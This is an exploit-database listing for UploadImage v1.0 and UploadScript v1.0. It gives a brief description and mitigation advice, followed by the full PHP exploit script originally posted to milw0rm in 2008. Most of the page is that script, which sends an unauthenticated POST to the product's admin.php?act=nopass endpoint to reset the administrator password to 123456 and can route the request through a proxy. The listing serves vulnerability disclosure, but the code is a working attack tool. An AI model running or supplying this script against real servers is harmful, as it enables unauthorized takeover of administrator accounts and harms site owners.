header-logo
Suggest Exploit
vendor:
UploadImage v1.0 & UploadScript v1.0
by:
Y! Underground Group
7.5
CVSS
HIGH
Remote Change Admin Password Exploit
CWE
Product Name: UploadImage v1.0 & UploadScript v1.0
Affected Version From: UploadImage v1.0 & UploadScript v1.0
Affected Version To: UploadImage v1.0 & UploadScript v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

UploadImage v1.0 & UploadScript v1.0 Remote Change Admin Password Exploit

This exploit allows an attacker to remotely change the admin password on a target server running UploadImage v1.0 or UploadScript v1.0. The exploit takes advantage of a vulnerability in the software to bypass authentication and change the admin password. The vulnerability can be exploited by providing a malicious payload to the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of UploadImage or UploadScript. Additionally, it is important to ensure that the server is properly configured and secured to prevent unauthorized access.
Source

Exploit-DB raw data:

<?php

/*
        \\\|///
      \\  - -  //         Y! Underground Group
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[!] Portal   :   UploadImage v1.0 & UploadScript v1.0
[!] Download :   http://www.uploadscript.net
[!] Type     :   Remote Change Admin Password Exploit
{!} Home     :   http://nobody.ir

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

*/

if ($argc<5) {
print_r('
*********************************************************************

Usage: php '.$argv[0].' Host Path Options
host:       Target server (ip/hostname)
path:       Path To Folder

Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy

Example:
php '.$argv[0].' 127.0.0.1 /Path/ -P1.1.1.1:80

*********************************************************************
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];

$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="submit"

Set Password
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="pass"

123456
-----------------------------7d6224c08dc
';

$packet ="POST ".$path."admin.php?act=nopass HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
echo "New Password Is 123456";
?>

# milw0rm.com [2008-01-09]

Navigation

Suggest Exploit

Services By CQR